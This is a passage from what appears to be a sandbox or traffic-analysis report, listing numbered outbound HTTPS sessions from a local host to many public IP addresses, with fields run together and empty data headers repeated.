                                        10395192.168.2.1357196117.69.75.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10396192.168.2.1352056193.219.27.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10397192.168.2.133710840.40.188.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10398192.168.2.1341728119.32.55.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10399192.168.2.13554929.230.75.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10400192.168.2.1340274170.201.63.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10401192.168.2.134551450.16.236.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10402192.168.2.1340170169.122.234.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10403192.168.2.136066885.172.30.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10404192.168.2.1359936117.255.179.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10405192.168.2.133481235.58.71.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10406192.168.2.135045257.15.59.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10407192.168.2.1337856124.123.15.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10408192.168.2.1355368160.128.168.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10409192.168.2.1353068176.52.32.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10410192.168.2.1352254197.6.190.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10411192.168.2.1337146131.212.27.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10412192.168.2.1348556159.4.207.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10413192.168.2.134232257.7.42.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10414192.168.2.1340662157.143.118.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10415192.168.2.1345386178.217.125.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10416192.168.2.1358524124.240.14.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10417192.168.2.1337344160.40.10.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10418192.168.2.1350326136.101.141.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10419192.168.2.1346374204.250.94.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10420192.168.2.1336702165.119.82.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10421192.168.2.134502873.219.35.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10422192.168.2.1357342120.114.105.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10423192.168.2.135728252.209.227.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10424192.168.2.135072840.110.103.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10425192.168.2.1353474156.0.106.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10426192.168.2.135119094.133.88.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10427192.168.2.1345750190.44.30.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10428192.168.2.1355476173.255.207.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10429192.168.2.1346758166.18.124.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10430192.168.2.1358388169.32.154.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10431192.168.2.1343452213.5.26.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10432192.168.2.134614052.230.2.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10433192.168.2.135882877.153.166.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10434192.168.2.1354868156.58.224.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10435192.168.2.1354190151.233.136.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10436192.168.2.133620619.181.49.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10437192.168.2.135866680.29.229.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10438192.168.2.1334360152.88.108.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10439192.168.2.133439285.252.79.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10440192.168.2.134984468.144.26.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10441192.168.2.1332956130.85.129.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10442192.168.2.1340384120.131.44.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10443192.168.2.133615290.253.48.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10444192.168.2.135722085.201.9.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10445192.168.2.1340990204.36.250.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10446192.168.2.1353648165.100.201.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10447192.168.2.1341480134.216.171.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10448192.168.2.1357990183.61.217.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10449192.168.2.1344068180.15.229.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10450192.168.2.135053888.145.195.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10451192.168.2.1347922174.139.64.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10452192.168.2.134009682.191.159.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10453192.168.2.1341770171.51.117.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10454192.168.2.135363851.7.239.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10455192.168.2.135979880.175.129.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10456192.168.2.1355146196.29.89.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10457192.168.2.1345440111.154.150.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10458192.168.2.1350328211.81.135.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10459192.168.2.13589382.148.226.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10460192.168.2.1340136174.13.169.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10461192.168.2.133503449.201.158.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10462192.168.2.135696647.0.173.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10463192.168.2.1338968200.170.10.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10464192.168.2.1352794145.168.125.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10465192.168.2.135036089.73.245.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10466192.168.2.133429675.58.93.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10467192.168.2.134160077.128.213.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10468192.168.2.1347642203.174.102.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10469192.168.2.1350720196.82.76.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10470192.168.2.1360542166.150.46.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10471192.168.2.13571465.122.217.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10472192.168.2.1350336172.177.206.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10473192.168.2.1346020189.83.242.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10474192.168.2.1335336188.231.247.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10475192.168.2.135340034.9.35.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10476192.168.2.1340274203.246.86.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10477192.168.2.1346532216.213.227.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10478192.168.2.1337776169.221.84.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10479192.168.2.134993061.46.110.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10480192.168.2.1339684124.29.49.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10481192.168.2.1360864119.107.128.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10482192.168.2.133695892.159.119.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10483192.168.2.1333298105.191.246.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10484192.168.2.134912468.4.182.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10485192.168.2.134743218.246.103.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10486192.168.2.1352418101.181.13.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10487192.168.2.1334690178.237.235.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10488192.168.2.1358898148.242.3.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10489192.168.2.1343706164.133.90.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10490192.168.2.1342586190.77.247.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10491192.168.2.135603872.156.111.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10492192.168.2.1343152194.7.167.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10493192.168.2.13533344.177.229.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10494192.168.2.1356874126.1.206.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10495192.168.2.134007846.19.143.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10496192.168.2.1357718100.25.160.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10497192.168.2.1333958185.164.140.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10498192.168.2.1343294179.206.78.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10499192.168.2.134719293.141.233.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10500192.168.2.1340144162.202.67.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10501192.168.2.1336974197.9.173.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10502192.168.2.1356616153.55.63.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10503192.168.2.1345816105.128.137.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10504192.168.2.133283039.89.159.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10505192.168.2.1355372149.192.105.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10506192.168.2.1345540104.146.53.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10507192.168.2.1334414222.61.5.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10508192.168.2.1352156188.213.21.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10509192.168.2.135133018.116.249.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10510192.168.2.135427450.103.210.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10511192.168.2.1349690109.151.31.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10512192.168.2.133523484.208.215.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10513192.168.2.1358208161.178.203.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10514192.168.2.134518098.126.29.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10515192.168.2.134830882.191.193.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10516192.168.2.13557222.54.187.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10517192.168.2.1338006151.91.164.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10518192.168.2.135649462.169.56.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10519192.168.2.133571248.102.132.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10520192.168.2.133515234.98.192.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10521192.168.2.1352224153.244.62.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10522192.168.2.133382024.248.222.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10523192.168.2.133339066.40.40.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10524192.168.2.1348976152.40.75.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10525192.168.2.1354334213.186.220.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10526192.168.2.1352790165.70.128.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10527192.168.2.134732045.208.29.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10528192.168.2.133329249.42.139.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10529192.168.2.135259812.141.249.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10530192.168.2.1340840217.90.212.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10531192.168.2.1339864213.217.71.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10532192.168.2.1339516151.159.168.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10533192.168.2.1357792174.26.91.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10534192.168.2.1346506184.213.71.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10535192.168.2.1339964213.59.230.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10536192.168.2.1335418122.118.36.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10537192.168.2.134303051.79.104.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10538192.168.2.1342090149.85.127.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10539192.168.2.134719224.125.171.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10540192.168.2.1342768194.247.200.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10541192.168.2.1359518165.211.56.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10542192.168.2.1359912192.107.22.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10543192.168.2.1342788219.22.140.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10544192.168.2.135481266.41.119.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10545192.168.2.1341058145.226.100.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10546192.168.2.133565476.146.231.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10547192.168.2.1336834191.43.254.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10548192.168.2.1349550129.150.62.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10549192.168.2.1334000189.142.56.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10550192.168.2.1345006120.143.141.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10551192.168.2.1355220223.187.80.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10552192.168.2.1333342198.236.121.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10553192.168.2.1360290220.136.149.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10554192.168.2.1335650115.43.253.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10555192.168.2.135962086.70.204.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10556192.168.2.1347682195.121.28.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10557192.168.2.1353822168.207.114.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10558192.168.2.135855013.155.65.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10559192.168.2.133357265.72.69.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10560192.168.2.1347426122.27.132.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10561192.168.2.1336078181.51.162.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10562192.168.2.1344280180.213.0.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10563192.168.2.1346840191.107.51.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10564192.168.2.1355874125.238.187.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10565192.168.2.136092068.102.165.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10566192.168.2.1347952139.143.17.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10567192.168.2.1348594118.108.142.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10568192.168.2.133428890.226.147.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10569192.168.2.135004657.223.63.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10570192.168.2.1341676185.84.127.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10571192.168.2.134620850.206.61.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10572192.168.2.134310078.161.62.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10573192.168.2.1340780123.138.137.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10574192.168.2.135355249.255.60.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10575192.168.2.1360578139.226.214.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10576192.168.2.1338890200.5.174.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10577192.168.2.134322891.82.185.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10578192.168.2.1344320217.14.93.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10579192.168.2.1358744186.180.141.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10580192.168.2.135533092.201.145.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10581192.168.2.1339240196.190.157.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10582192.168.2.136037060.22.34.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10583192.168.2.135921052.79.181.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10584192.168.2.1355156205.25.63.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10585192.168.2.1346136202.140.102.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10586192.168.2.135403459.48.18.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10587192.168.2.1345560113.104.232.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10588192.168.2.133691214.203.163.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10589192.168.2.133295013.20.212.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10590192.168.2.1348732113.190.103.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10591192.168.2.135874044.122.92.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10592192.168.2.135734881.131.163.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10593192.168.2.134965845.211.139.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10594192.168.2.13419884.117.48.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10595192.168.2.1336512220.141.181.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10596192.168.2.1344318115.124.98.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10597192.168.2.134174842.135.63.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10598192.168.2.1343356172.107.233.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10599192.168.2.1354960136.230.181.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10600192.168.2.1354350108.75.245.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10601192.168.2.134977697.135.229.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10602192.168.2.1360908179.132.130.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10603192.168.2.1349644111.91.242.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10604192.168.2.1360704147.38.78.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10605192.168.2.1360612110.88.7.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10606192.168.2.1348122165.116.42.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10607192.168.2.1340254155.222.56.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10608192.168.2.134176873.233.211.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10609192.168.2.1349956154.223.15.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10610192.168.2.1348870211.8.53.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10611192.168.2.1338798136.53.9.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10612192.168.2.134741477.187.230.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10613192.168.2.134618213.64.100.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10614192.168.2.1355958181.148.151.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10615192.168.2.13515284.3.4.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10616192.168.2.134910476.93.30.129443
                                        TimestampBytes transferredDirectionData


